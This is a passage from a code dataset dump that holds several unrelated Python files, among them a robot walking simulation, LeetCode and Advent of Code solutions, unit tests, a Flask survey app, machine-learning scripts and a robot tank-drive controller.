swkneetime - sw_zero_to_five_time:\n pa_or_con_flag = 1\n swing_kneeangle = knee_angle_zero\n #0 -> ic_knee_angle\n else:\n pa_or_con_flag = 1\n swing_kneeangle = swing_kneeangle + ic_knee_angle / sw_zero_to_five_time\n \n #support legs\n #hip ic_hip_angle -> tst_hip_angle\n if count >= sleeptime and count <= suhiptime:\n support_hipangle = support_hipangle + PI * 2 / 9 / (suhiptime - sleeptime)\n #knee\n if count >= sleeptime and count <= sukneetime:\n #ic_knee_angle -> lr_knee_angle\n if count <= sleeptime + sukneemovetime:\n support_kneeangle = support_kneeangle + (lr_knee_angle - ic_knee_angle) / sukneemovetime\n #reverse\n elif count > sleeptime + sukneemovetime and count <= sleeptime + sukneemovetime * 2:\n support_kneeangle = support_kneeangle - (lr_knee_angle - ic_knee_angle) / sukneemovetime\n #ic_knee_angle -> 0\n elif count > sleeptime + sukneemovetime * 2 and count <= sukneetime - su_zero_to_five_time:\n support_kneeangle = support_kneeangle - (ic_knee_angle / su_mid_time)\n #reverse\n else:\n support_kneeangle = support_kneeangle + (ic_knee_angle / su_zero_to_five_time)\n\n \n #if count == 1010:\n #if (count >= sleeptime + 10) and ((phase == 1 and outer_conflag == 1 and inner_conflag == 0) or (phase == 2 and outer_conflag == 0 and inner_conflag == 1)):\n if (count >= sleeptime + 100) and ((phase == 1 and outer_conflag == 1) or (phase == 2 and inner_conflag == 1)): \n simflag = 1\n #print(\"pahse change!!\")\n \n count = sleeptime\n #reset angle \n \n #swing_hipangle = PI * 5 / 36\n #swing_kneeangle = 0\n #support_hipangle = -1 * PI / 12\n #support_kneeangle = 0\n swing_hipangle = ic_hip_angle\n swing_kneeangle = ic_knee_angle\n support_hipangle = tst_hip_angle\n support_kneeangle = tst_knee_angle\n\n\n #change support legs\n if phase == 1:\n phase = 2\n elif phase == 2:\n phase = 1\n \n #outer legs: swing leg\n #inner legs: support leg\n if phase == 1:\n outer_hipangle = swing_hipangle\n outer_kneeangle = swing_kneeangle\n inner_hipangle = support_hipangle\n inner_kneeangle = support_kneeangle\n #Inner Legs\n p.setJointMotorControlArray(robotId, inner_hip_joints, controlMode=pmode, targetPositions=[inner_hipangle, inner_hipangle]) \n p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[inner_kneeangle, inner_kneeangle]) \n \n #Outer Legs\n p.setJointMotorControlArray(robotId, outer_hip_joints, controlMode=pmode, targetPositions=[outer_hipangle, outer_hipangle]) \n \n #passive mode\n if pa_or_con_flag == 0:\n #torque 0 knee\n p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=vmode, forces=[0, 0]) \n #position contorol mode\n else:\n p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[outer_kneeangle, outer_kneeangle]) \n\n #outer legs: supprt leg\n #inner legs: swing leg\n elif phase == 2: \n outer_hipangle = support_hipangle\n outer_kneeangle = support_kneeangle\n inner_hipangle = swing_hipangle\n inner_kneeangle = swing_kneeangle\n #Outer Legs\n p.setJointMotorControlArray(robotId, outer_hip_joints, controlMode=pmode, targetPositions=[outer_hipangle, outer_hipangle]) \n p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[outer_kneeangle, outer_kneeangle]) \n \n #Inner Legs\n p.setJointMotorControlArray(robotId, inner_hip_joints, controlMode=pmode, targetPositions=[inner_hipangle, inner_hipangle]) \n \n #passive mode\n if pa_or_con_flag == 0:\n #torque 0 knee\n p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=vmode, forces=[0, 0]) \n #position contorol mode\n else:\n p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[inner_kneeangle, inner_kneeangle]) \n\n\n #get Base position\n basePos, baseQua = p.getBasePositionAndOrientation(robotId)\n #set camera position \n p.resetDebugVisualizerCamera(2.0, 20, -30, basePos)\n \n #Get joints num\n #jnum = p.getNumJoints(robotId)\n #print('joints num = {}'.format(jnum))\n\n #Get joint information\n #jointinfo = p.getJointInfo(robotId, jindex)\n #print(jointinfo[1])\n \n #passive or control change the rule\n\n #Inner Legs\n #p.setJointMotorControlArray(robotId, inner_hip_joints, controlMode=pmode, targetPositions=[inner_hipangle, inner_hipangle]) \n #p.setJointMotorControlArray(robotId, inner_knee_joints, controlMode=pmode, targetPositions=[inner_kneeangle, inner_kneeangle]) \n \n #Outer Legs\n #p.setJointMotorControlArray(robotId, outer_hip_joints, controlMode=pmode, targetPositions=[outer_hipangle, outer_hipangle]) \n #p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=pmode, targetPositions=[outer_kneeangle, outer_kneeangle]) \n #torque 0 knee\n #p.setJointMotorControlArray(robotId, outer_knee_joints, controlMode=vmode, forces=[0, 0]) \n \n\n \n\n #step forward in the simlation\n p.stepSimulation()\n #wait a bit to smooth the simulation\n time.sleep(1./300.)\n\np.disconnect()\n\n","sub_path":"test_walker1/passive_dynamic-simulator3.py","file_name":"passive_dynamic-simulator3.py","file_ext":"py","file_size_in_byte":11610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"273702411","text":"class Solution:\n def latestDayToCross(self, row: int, col: int, cells) -> int:\n n = row * col\n directs = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n def valid(x):\n a = [[0 for j in range(col)] for i in range(row)]\n for i in range(x):\n c1, c2 = cells[i][0] - 1, cells[i][1] - 1\n a[c1][c2] = 1\n q = [(0, i) for i in range(col) if a[0][i] == 0]\n visited = set(q)\n while q:\n newQ = []\n for x, y in q:\n if x == row - 1:\n return True\n for dx, dy in directs:\n i, j = x + dx, y + dy\n if 0 <= i < row and 0 <= j < col and a[i][j] == 0 and (i, j) not in visited:\n newQ.append((i, j))\n visited.add((i, j))\n q = newQ\n return False\n\n l, r = 1, n - 1\n while l < r:\n m = (l + r + 1) // 2\n if valid(m):\n l = m\n else:\n r = m - 1\n return l\n\n\ns = Solution()\nprint(s.latestDayToCross(6,\n 2,\n [[4, 2], [6, 2], [2, 1], [4, 1], [6, 1], [3, 1], [2, 2], [3, 2], [1, 1], [5, 1], [5, 2],\n [1, 2]]))\nprint(s.latestDayToCross(3, 3, [[1, 2], [2, 1], [3, 3], [2, 2], [1, 1], [1, 3], [2, 3], [3, 2], [3, 1]]))\nprint(s.latestDayToCross(2, 2, [[1, 1], [2, 1], [1, 2], [2, 2]]))\n","sub_path":"leetcode/2021/contest/weekly-254/Contest4.py","file_name":"Contest4.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"592386552","text":"import math\n\ninputFile = open(\"input_day1.txt\", \"r\")\n\n\ndef calc_fuel_needed(module_mass):\n fuel_needed = math.floor(int(module_mass)/3)-2\n return fuel_needed\n\n\ntotal_fuel = 0\nfor line in inputFile:\n fuel_per_module = calc_fuel_needed(line)\n total_fuel += fuel_per_module\n\nprint(\"The total fuel count is: \" + str(total_fuel))\n","sub_path":"day01/fuelCounter.py","file_name":"fuelCounter.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"109752722","text":"\"\"\"\nThis doesn't really belong here, but you can't create\ncommands at the main config package :(.\n\"\"\"\nimport sys\nfrom django.core.management.base import BaseCommand\n\nfrom honcho.manager import Manager\n\n\nclass Command(BaseCommand):\n help = 'Runs the devserver with all dependencies'\n\n def handle(self, *args, **options):\n m = Manager()\n m.add_process('web', './manage.py runserver')\n m.add_process('celery', 'celery -A website worker --beat -l info '\n '--scheduler django')\n m.loop()\n\n sys.exit(m.returncode)\n","sub_path":"core/management/commands/devserver.py","file_name":"devserver.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87316708","text":"import pytest\n\nfrom mocket.plugins.httpretty import HTTPretty\nfrom mocket import Mocketizer\n\nfrom genericclient_aiohttp import GenericClient\nfrom genericclient_aiohttp.pagination import link_header\n\n\n@pytest.mark.asyncio\nasync def test_paginate(api_url, register_json):\n generic_client = GenericClient(url=api_url, autopaginate=link_header)\n\n with Mocketizer():\n register_json(\n HTTPretty.GET, '/users', json=[{'id': 1}],\n link='<{api_url}/users?page=2>; rel=next'.format(api_url=api_url)\n )\n register_json(\n HTTPretty.GET, '/users?page=2', json=[{'id': 2}],\n link='<{api_url}/users>; rel=previous, <{api_url}/users?page=3>; rel=next'.format(api_url=api_url)\n )\n register_json(\n HTTPretty.GET, '/users?page=3', json=[{'id': 3}],\n link='<{api_url}/users?page=2>; rel=previous'.format(api_url=api_url)\n )\n users = await generic_client.users.all()\n\n assert len(users) == 3\n assert users[0].id == 1\n assert users[1].id == 2\n assert users[2].id == 3\n","sub_path":"tests/test_paginate.py","file_name":"test_paginate.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"16075118","text":"import unittest,os\nfrom question1 import *\n\nclass DataCreatorTests(unittest.TestCase):\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n def testread_over_lap_check1(self):\n in1=(2,5)\n in2=(3,9)\n result = over_lap_check(in1, in2)\n expect_result=True\n self.assertEqual(expect_result,result)\n\n def testread_over_lap_check2(self):\n in1 = (2, 5)\n in2 = (-3, 9)\n result = over_lap_check(in1, in2)\n expect_result = True\n self.assertEqual(expect_result, result)\n\n def testread_over_lap_check3(self):\n in1 = (2, 5)\n in2 = (6, 9)\n result = over_lap_check(in1, in2)\n expect_result = False\n self.assertEqual(expect_result, result)\n\n def testread_over_lap_check4(self):\n in1 = (-7, -1)\n in2 = (-3, 9)\n result = over_lap_check(in1, in2)\n expect_result = True\n self.assertEqual(expect_result, result)\n\n def testread_over_lap_check5(self):\n in1 = (-7, -1)\n in2 = (-13, -9)\n result = over_lap_check(in1, in2)\n expect_result = False\n self.assertEqual(expect_result, result)\n\n def test_read_over_lap_check6(self):\n in1 = (2, 5)\n in2 = ('a', 9)\n result = over_lap_check(in1, in2)\n self.assertIsNone( result)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"ormunco/test/test_question1.py","file_name":"test_question1.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"119423282","text":"import math\nimport torch\nimport gpytorch\nimport numpy as np\n\nfrom sklearn import svm\nimport gp_core\n\n\n'''\ndef func1(x):\n return np.sin(x * (2 * math.pi))*np.sin(x * (2 * math.pi))\n\ndef func2(x):\n return np.sin(x * (10 * math.pi))*np.sin(x * (10 * math.pi))\n'''\n\ndef func1(x):\n return x\n\ndef func2(x):\n return torch.ones(x.shape)\n\n\ndef train(train_x, train_y, expert_num=2, linear_model_basis=[func1,func2]):\n\n ratio=0.5\n datanum=train_x.shape[0]\n data=torch.cat((train_x, train_y.reshape(datanum,1)),dim=1)\n\n svm_input_data = np.array([[-1.],[3.]])\n svm_output_label=np.array([0,1])\n for i in range(0,20):\n\n # learn SVM\n clf = svm.SVC(C=1.)\n clf.fit(svm_input_data, svm_output_label)\n\n for k in range(20):# 1, 20\n print(k)\n # train/test data split\n data=data[np.random.permutation(np.arange(datanum)),:]\n split_n = int(math.floor(ratio*datanum))\n train_xy = data[:split_n,:]\n test_x = data[split_n:,:-1]\n test_y = data[split_n:,-1]\n\n\n # sort train data using SVM\n train_label = clf.predict(train_xy[:,:-1].numpy())\n\n\n # learn local SPGP experts\n expert_list=[]\n for j in range(expert_num):\n temp_train_x = train_xy[train_label==j, :-1]\n temp_train_y = train_xy[train_label==j,-1]\n temp_expert, temp_loss = gp_core.train_expert(temp_train_x, temp_train_y, rbf=True, linear_model=[func1,func2])\n expert_list.append(temp_expert)\n\n\n # labelling test data based on predictive likelihood.\n for j in range(expert_num):\n means, variances = expert_list[j].predict(test_x)\n temp_score = torch.log(2.*math.pi*variances) + (means-test_y)*(means-test_y)/variances\n if 0==j:\n score = temp_score\n else:\n score = torch.cat((score,temp_score),dim=0)\n value, index = score.min(dim=0)\n\n if 0==k:\n svm_input_data =test_x.numpy()\n svm_output_label=index.numpy()\n else:\n svm_input_data = np.concatenate([svm_input_data, test_x.numpy()], 0)\n svm_output_label = np.concatenate([svm_output_label, index.numpy()], 0)\n\n\n # compute total loss\n expert_list=[]\n loss_list=[]\n label = clf.predict(data[:,:-1].numpy())\n for j in range(expert_num):\n temp_expert, temp_loss = gp_core.train_expert(data[label==j,:-1], data[label==j,-1], rbf=True, linear_model=[func1,func2])\n expert_list.append(temp_expert)\n loss_list.append(temp_loss)\n print(i,\"loss =\",sum(loss_list))\n\n\n # draw and save figure\n #'''\n if 0==(i%1):\n from matplotlib import pyplot as plt\n plt.plot(data[:,:-1].numpy(), data[:,-1].numpy(), 'k*')\n label = clf.predict(data[:,:-1].numpy())\n for j in range(expert_num):\n means, variances = expert_list[j].predict(data[label==j,:-1])\n if j==0:\n plt.plot(data[label==j,:-1].numpy(), means.numpy().T, 'ro')\n else:\n plt.plot(data[label==j,:-1].numpy(), means.numpy().T, 'co')\n \n plt.title(\"iteration \"+str(i))\n plt.savefig(\"fig_iter\"+str(i)+\".png\", dpi=500)\n plt.close()\n \n #'''\n","sub_path":"develop6/local_spgp.py","file_name":"local_spgp.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"578070199","text":"import datetime as dt\nfrom pylab import *\nimport numpy as np\nimport sys\nimport pandas\nimport csv\n\n\nclass KNNLearner:\n\n def __init__(self, K):\n self.k = K\n self.x_train = None\n self.y_train = None\n \n\n def addEvidence(self, X_train, Y_train):\n self.x_train = X_train\n self.y_train = Y_train\n \n def query_xvector(self, input_X):\n train_rows = int(self.x_train.shape[0])\n test_rows = int(input_X.shape[0])\n vector_length = int(input_X.shape[1])\n \n e_dist = np.zeros((train_rows,2))\n result = np.zeros((test_rows,1))\n rng = np.arange(test_rows)\n \n for row_index in rng:\n e_dist[:,0] = self.y_train[:,0]\n e_dist[:,1] = np.sum((self.x_train - input_X[row_index,:])**2,axis=1)\n \n data = e_dist\n indices = data[:,-1].argsort()\n selection = indices[:self.k]\n #print selection\n temp = 0\n for sel_index in selection:\n temp = temp+data[sel_index,0]\n #print temp\n result[row_index] = temp / self.k\n return result\n\n def query(self, X_test):\n train_rows = int(self.x_train.shape[0])\n #rng2 = np.arange(train_rows)\n test_rows = int(X_test.shape[0])\n dist = np.zeros((train_rows,2))\n result = np.zeros((test_rows,1))\n rng = np.arange(test_rows)\n \n for row_index in rng:\n dist[:,0] = self.y_train[:,0]\n dist[:,1] = np.sum((self.x_train - X_test[row_index,:])**2,axis=1)\n \n #for row_index2 in rng2:\n # dist[row_index2,0] = self.y_train[row_index2]\n # dist[row_index2,1] = np.linalg.norm(X_test[row_index,:]-self.x_train[row_index2,:])\n data = dist\n indices = data[:,-1].argsort()\n selection = indices[:self.k]\n #print selection\n temp = 0\n for sel_index in selection:\n temp = temp+data[sel_index,0]\n #print temp\n result[row_index] = temp / self.k\n return result","sub_path":"other/example_code/KNNLearner.py","file_name":"KNNLearner.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497265200","text":"from PyQt5 import QtWidgets\nfrom layouts import Ui_Form\nimport sys\nif __name__==\"__main__\":\n app=QtWidgets.QApplication(sys.argv)\n ui=Ui_Form()\n widget=QtWidgets.QWidget()\n ui.setupUi(widget)\n widget.show()\n sys.exit(app.exec_())","sub_path":"gui/main_layouts.py","file_name":"main_layouts.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"640634286","text":"# -*- coding: utf8 -*-\nfrom os import listdir, system\nfrom os.path import isfile, basename, splitext\nfrom getch import getch\nimport re\nimport sys\nimport argparse\n\narg_parser = argparse.ArgumentParser(description='download_folder')\narg_parser.add_argument('-b', help='the board folder with raw_data articles')\nargs = arg_parser.parse_args()\n\ndef show_article_list(data, start, end, cursor):\n system('clear')\n for i in xrange(start, end):\n if i - start == cursor:\n sys.stdout.write('> ')\n else:\n sys.stdout.write(' ')\n sys.stdout.write(str(i) + '\\t' + data[i] + '\\n')\n sys.stdout.write(str(end - 1) + ' / ' + str(len(data) - 1) + '\\n')\n\ndef show_article(data, index):\n system('clear')\n file_name = args.b + str(index) + ' ' + data[index] + '.txt'\n f = open(file_name, 'r')\n article = f.read()\n\n # identify pages\n pages = [0]\n for i in re.finditer(\"<>\", article):\n pages.append(i.start())\n\n curr_page = 0\n while True:\n page_start = pages[curr_page]\n if curr_page == len(pages) - 1:\n page_end = -1\n else:\n page_end = pages[curr_page + 1]\n sys.stdout.write(article[page_start:page_end] + '\\n')\n sys.stdout.flush()\n cmd = get_user_command(\"(n)ext page, (p)revious page, b(a)ck: \")\n if cmd == 'n':\n if curr_page != len(pages): # not end of article\n curr_page += 1\n elif cmd == 'p':\n if curr_page > 0:\n curr_page -= 1\n elif cmd == 'a':\n return\n\ndef get_user_command(msg):\n sys.stdout.write(msg)\n sys.stdout.flush()\n cmd = getch()\n sys.stdout.write('\\n')\n return cmd\n\n# get articles\narticles = [f for f in listdir(args.b) if f.find('.txt') != -1]\n\n# build article list\nnum_article = len(articles)\narticle_list = []\nfor i in xrange(num_article + 1):\n article_list.append('')\n\nfor a in articles:\n idx_and_title = re.search(\"(\\d+) (.*)\", splitext(a)[0])\n if idx_and_title == None:\n continue\n idx = idx_and_title.group(1)\n title = idx_and_title.group(2)\n article_list[int(idx)] = title\n\n# display\ncursor = 0\ncurr_start = 1\narticle_per_page = 10\nlast_cmd = ''\nwhile True:\n curr_end = min(curr_start + article_per_page, num_article)\n show_article_list(article_list, curr_start, curr_end, cursor)\n cmd = get_user_command('(n)ext page, (p)revious page (q)uit: ')\n\n # stage 1: quit cheking\n if cmd == 'q':\n break\n\n # stage 2: open article\n if cmd == 'd':\n show_article(article_list, curr_start + cursor)\n\n # stage 2: move cursor\n if cmd == 'w':\n if cursor > 0:\n cursor -= 1\n else:\n cmd = 'p'\n cursor = article_per_page - 1\n elif cmd == 's':\n if cursor < article_per_page - 1:\n cursor += 1\n else:\n cmd = 'n'\n cursor = 0\n\n # stage 3: change page\n if cmd == 'n' and curr_end != num_article:\n curr_start += article_per_page\n elif cmd == 'p' and curr_start > 0:\n curr_start = max(curr_start - article_per_page, 1)\n\n","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"481385725","text":"from flask import Flask,render_template,redirect,request,session,flash\nfrom mysqlconnection import connectToMySQL # import the function that will return an instance of a connection\n\napp = Flask(__name__)\napp.secret_key = \"validation\"\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if request.form:\n is_valid = True\n if len(request.form['name']) < 3:\n is_valid = False\n flash(\"Name must be at least 3 characters!\")\n try :\n dojo_id = int(request.form['dojo_id']) \n except Exception:\n is_valid = False\n flash(\"Must select Dojo!\")\n try :\n language_id = int(request.form['language_id']) \n except Exception:\n is_valid = False\n flash(\"Must select Language!\")\n if len(request.form['comment']) < 3:\n is_valid = False\n flash(\"Comment must be at least 3 characters!\")\n if not is_valid:\n return redirect('/')\n else:\n query = \"INSERT INTO students (name, comment, dojo_id, language_id) VALUES (%(name)s, %(comment)s, %(dojo_id)s, %(language_id)s);\"\n data = {\n \"name\":request.form['name'],\n \"comment\":request.form['comment'],\n \"dojo_id\":request.form['dojo_id'],\n \"language_id\":request.form['language_id']\n }\n student_id = connectToMySQL('dojo-survey').query_db(query, data)\n return redirect(f\"/display/{student_id}\")\n else:\n query_dojos = \"SELECT * FROM dojos;\"\n query_languages = \"SELECT * FROM languages;\"\n dojos = connectToMySQL('dojo-survey').query_db(query_dojos)\n languages = connectToMySQL('dojo-survey').query_db(query_languages)\n return render_template(\"index.html\", dojos=dojos, languages=languages)\n\n\n@app.route('/display/', methods=[\"GET\"])\ndef display(student_id):\n query = \"SELECT students.name, dojos.location, languages.language, students.comment FROM students JOIN languages on languages.id = students.language_id JOIN dojos on dojos.id = students.dojo_id WHERE students.id = %(student_id)s;\"\n data = {\n \"student_id\":student_id\n }\n students = connectToMySQL('dojo-survey').query_db(query, data)\n print(students)\n return render_template(\"display.html\", students=students)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"132331425","text":"from django.shortcuts import render\nfrom .models import Cas\n\n\ndef lista_casova(request):\n\n if request.method == 'GET':\n casovi = Cas.objects.all().order_by('dan', 'vreme_pocetka')\n context = {'casovi': casovi}\n return render(request, 'raspored/home.html', context)\n\n","sub_path":"apps/raspored/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"41938070","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 3 12:17:38 2018\n\n@author: github.com/GustavZ\n\"\"\"\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport yaml\nimport cv2\nfrom stuff.helper import Model, FPS, WebcamVideoStream, create_colormap, vis_text\nfrom skimage import measure\n\n\n## LOAD CONFIG PARAMS ##\nif (os.path.isfile('config.yml')):\n with open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\nelse:\n with open(\"config.sample.yml\", 'r') as ymlfile:\n cfg = yaml.load(ymlfile)\nVIDEO_INPUT = cfg['video_input']\nFPS_INTERVAL = cfg['fps_interval']\nALPHA = cfg['alpha']\nMODEL_NAME = cfg['dl_model_name']\nMODEL_PATH = cfg['dl_model_path']\nBBOX = cfg['bbox']\nMINAREA = cfg['minArea']\nVISUALIZE = cfg['visualize']\n\n\n# Hardcoded COCO_VOC Labels\nLABEL_NAMES = np.asarray([\n 'background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus',\n 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tv'])\n\n\ndef segmentation(model):\n detection_graph = model.detection_graph\n # fixed input sizes as model needs resize either way\n vs = WebcamVideoStream(VIDEO_INPUT,640,480).start()\n resize_ratio = 1.0 * 513 / max(vs.real_width,vs.real_height)\n target_size = (int(resize_ratio * vs.real_width), int(resize_ratio * vs.real_height))\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth=True\n fps = FPS(FPS_INTERVAL).start()\n print(\"> Starting Segmentaion\")\n with detection_graph.as_default():\n with tf.Session(graph=detection_graph,config=config) as sess:\n while vs.isActive():\n frame = vs.resized(target_size)\n batch_seg_map = sess.run('SemanticPredictions:0',\n feed_dict={'ImageTensor:0': [cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)]})\n # visualization\n if VISUALIZE:\n seg_map = batch_seg_map[0]\n seg_image = create_colormap(seg_map).astype(np.uint8)\n cv2.addWeighted(seg_image,ALPHA,frame,1-ALPHA,0,frame)\n vis_text(frame,\"fps: {}\".format(fps.fps_local()),(10,30))\n # boxes (ymin, xmin, ymax, xmax)\n if BBOX:\n map_labeled = measure.label(seg_map, connectivity=1)\n for region in measure.regionprops(map_labeled):\n if region.area > MINAREA:\n box = region.bbox\n p1 = (box[1], box[0])\n p2 = (box[3], box[2])\n cv2.rectangle(frame, p1, p2, (77,255,9), 2)\n vis_text(frame,LABEL_NAMES[seg_map[tuple(region.coords[0])]],(p1[0],p1[1]-10))\n cv2.imshow('segmentation',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n fps.update()\n fps.stop()\n vs.stop()\n\n\nif __name__ == '__main__':\n model = Model('dl', MODEL_NAME, MODEL_PATH).prepare_dl_model()\n segmentation(model)\n","sub_path":"run_deeplab.py","file_name":"run_deeplab.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"614826519","text":"from GJEMS.morph.morph import BasicMorph\nfrom GJEMS.morph.morphImport import SubTreeWriter\nimport sys\nimport numpy as np\nfrom scipy.cluster import hierarchy\nfrom scipy.spatial.distance import pdist\n\n\n\nassert len(sys.argv) == 3, 'Two arguments, the path of the swcfile and number to use expected, ' \\\n + str(len(sys.argv) - 1) + 'found'\nswcFile = sys.argv[1]\n\n\ndef getLeavesList(clusterNode):\n\n # For more info look at the doc of clusterNode.pres_order\n return clusterNode.pre_order(lambda x: x.id)\n\n\n\ntestNrn = BasicMorph(swcFile)\ntestNrn.initTerminalDegrees()\ntestNrn.initxyzr()\n\n\n\nobs = []\n\nsecNames = []\nfor morphSec in testNrn.allsec.itervalues():\n\n parentName = ''\n if not morphSec.ptr.sec.name() == 'Cell[0].soma[0]':\n parentName = morphSec.ptr.parent.name()\n if not ((parentName == 'Cell[0].soma[0]') and (morphSec.terminalDegree == 0)):\n obs.append([morphSec.terminalDegree])\n secNames.append(morphSec.ptr.sec.name())\n\n\nobs = np.asarray(obs)\nnObs = len(obs)\n\nif nObs > 1:\n\n linkMatrix = hierarchy.single(pdist(obs))\n rootNode = hierarchy.to_tree(linkMatrix)\n\n\n leavesList = hierarchy.leaves_list(linkMatrix)\n if rootNode.left.count > rootNode.right.count:\n levelIDs = leavesList[:rootNode.left.count]\n\n else:\n levelIDs = leavesList[-rootNode.right.count:]\n\n grossFeaturesSecs = []\n presSecPtr = None\n\n grossFeaturesSecs.append(testNrn.rootPtr.sec.name())\n for childSec in testNrn.rootPtr.child:\n if childSec.name().find('soma') < 0:\n presSecPtr = testNrn.getPtr(childSec)\n\n assert presSecPtr is not None\n\n while True:\n\n if presSecPtr.nchild() == 0:\n grossFeaturesSecs.append(presSecPtr.sec.name())\n break\n\n # if presSecPtr.nchild() > 1:\n # print([secNames.index(x.name()) in levelIDs for x in presSecPtr.child])\n # import ipdb\n # ipdb.set_trace()\n\n nChildInLevel = 0\n for childSec in presSecPtr.child:\n if secNames.index(childSec.name()) in levelIDs:\n nChildInLevel += 1\n childSecInLevel = childSec\n\n if nChildInLevel == 1:\n grossFeaturesSecs.append(presSecPtr.sec.name())\n presSecPtr = testNrn.getPtr(childSecInLevel)\n\n else:\n grossFeaturesSecs.append(presSecPtr.sec.name())\n break\n\nelif nObs == 1:\n grossFeaturesSecs = secNames\n\n\n\n\n\ndef extraColFunc(secPtr):\n\n if secPtr.sec.name() in grossFeaturesSecs:\n return [int(sys.argv[2])]\n else:\n return [0]\n\n\n\nsswcFName = swcFile[:-4] + '_GrossFeatureColoured.sswc'\n\nswcWriter = SubTreeWriter(testNrn.rootPtr, extraColFunc)\nswcWriter.write(sswcFName)\n\n\n","sub_path":"test_tmp/shapeBasedAlignment/saveGrossFeatureColouredSSWCNrn.py","file_name":"saveGrossFeatureColouredSSWCNrn.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"81237306","text":"import math\nimport logging\n\nfrom ..controllers.pid_controller import PIDController\nfrom .pathfinder_python.DistanceFollower import DistanceFollower\nfrom ..spine.ourlogging import setup_logging\nfrom ..units import *\nfrom ..timer import Timer\n\nsetup_logging(__file__)\nlogger = logging.getLogger(__name__)\n\n\nclass TankDrive:\n\n def __init__(self, tank, gyro=None):\n self.tank = tank\n self.gyro = gyro\n self.timer = Timer()\n\n def drive_straight_voltage(self, value):\n if value == Unit(0, 1):\n self.tank.stop()\n else:\n self.tank.drive(value)\n\n def drive_arc_voltage(self, value, arc):\n self.tank.drive(value + arc, value - arc)\n\n def drive_voltage(self, left, right):\n self.tank.drive(left, right)\n\n def drive_straight_velocity(self, velocity):\n if(velocity == Constant(0)):\n self.tank.stop()\n else:\n self.tank.drive_pid(velocity)\n\n def drive_arc_velocity(self, velocity, radius, cw):\n\n angular_velocity = velocity / radius\n\n if cw:\n right = angular_velocity * (radius - (self.tank.wheelbase_width / 2))\n left = angular_velocity * (radius - (self.tank.wheelbase / 2))\n else:\n left = angular_velocity * (radius - (self.tank.wheelbase_width / 2))\n right = angular_velocity * (radius - (self.tank.wheelbase_width / 2))\n\n self.drive_velocity(left, right)\n\n def drive_velocity(self, left, right):\n self.tank.drive_pid(left, right)\n\n def drive_straight_velocity_for_time(self, velocity, delay, stop=True):\n self.drive_straight_velocity(velocity)\n self.timer.sleep(delay)\n if stop:\n self.tank.stop()\n\n def drive_arc_velocity_for_time(self, velocity, radius, cw, delay, stop=True):\n self.drive_arc_velocity(velocity, radius, cw)\n self.timer.sleep(delay)\n if stop:\n self.tank.stop()\n\n def drive_straight_distance(self, distance, p, i, d):\n if distance == Constant(0):\n self.tank.stop()\n else:\n self.tank.set_pid_type(\"distance\")\n distance_controller = PIDController(kp=p, ki=i, kd=d,\n input_sources=self.tank,\n output_sources=self.tank)\n distance_controller.set_setpoint(distance)\n while not distance_controller.is_finnished():\n distance_controller.calculate()\n\n def rotate_at_angular_velocity(self, angular_velocity):\n self.tank.rotate_pid(angular_velocity, -angular_velocity)\n\n def rotate_at_angular_velocity_for_time(self, angular_velocity, delay, stop=True):\n self.rotate_at_angular_velocity(angular_velocity)\n self.timer.sleep(delay)\n if stop:\n self.tank.stop()\n\n def rotate_to_angle(self, angle, p, i, d):\n if 